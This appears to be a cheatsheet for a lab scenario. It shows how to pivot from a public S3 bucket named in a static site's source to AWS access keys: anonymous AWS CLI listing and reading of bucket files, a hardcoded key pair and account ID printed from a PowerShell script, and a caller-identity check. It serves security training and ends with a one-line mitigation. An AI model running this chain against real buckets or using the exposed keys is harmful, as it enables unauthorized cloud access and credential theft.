Cheatsheet - AWS - Scenario - Basic S3 enumeration

Overview

  • Service/Tool: Web browser, AWS CLI
  • Use Case: In this scenario we walkthrough a methodology of pivoting from a publicly exposed S3 bucket hosting a static website to obtaining AWS access keys.
  • Prerequisites: Access to a publicly accessible S3 bucket.

Attack Workflow

1. Step 1 (Discovery/Access)

  • Objective: Locate S3 bucket from static website.
  • Command/Method: Upon viewing the source code of the application in the web browser we noted the following S3 address:
<img src="[https://s3.amazonaws.com/dev.huge-logistics.com/static/logo.png](https://s3.amazonaws.com/dev.huge-logistics.com/static/logo.png)" width="100

From this we are able to see that the resources on this page are backed by the S3 bucket: dev.huge-logistics.com to host static files.

  • Expected Output: In this step we located a S3 bucket to target for further reconnaissance.

2. Step 2 (Credential access via unsecured credentials)

  • Objective: Query the S3 bucket to locate sensitive files.
  • Command/Method:

Run an ls command on the S3 bucket via the aws cli - aws s3 ls s3://dev.huge-logistics.com --no-sign-request where --no-sign-request ensures that the request is not signed with any configured AWS keys.

We can then run a recursive ls on the S3 bucket to discover accessible files:

aws s3 ls s3://dev.huge-logistics.com --recursive

And further to that, we can review any files in the terminal via cp and using a dash (-) as the output file:

aws s3 cp s3://dev.huge-logistics.com/admin/file.txt -

In this particular scenario we were able to uncover the following file:

aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request

2023-10-17 01:08:33          0 
2023-10-17 01:09:01        993 hl_migration_project.zip

We were then able to pull down this file which contained a script containing credentials:

$ unzip hl_migration_project.zip 
Archive:  hl_migration_project.zip
  inflating: migrate_secrets.ps1     
$ cat migrate_secrets.ps1 
# AWS Configuration
$accessKey = "AKIA3SFMDAPOWOWKXEHU"
$secretKey = "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"
$region = "us-east-1"

# Set up AWS hardcoded credentials
Set-AWSCredentials -AccessKey $accessKey -SecretKey $secretKey

We can then test these credentials are valid via setting them with aws configure, and running some whoami-esk checks on the keys:

$ aws sts get-caller-identity
{
    "UserId": "AIDA3SFMDAPOYPM3X2TB7",
    "Account": "794929857501",
    "Arn": "arn:aws:iam::794929857501:user/pam-test"
}
  • Expected Output: Sensitive files that may lead to further compromise of the AWS environment.

Detection and Defense

  • Mitigation Techniques:
    • Do not store sensitive files in publicly exposed S3 buckets. Even files exposed for a minimal amount of time should be considered compromised.

Notes and References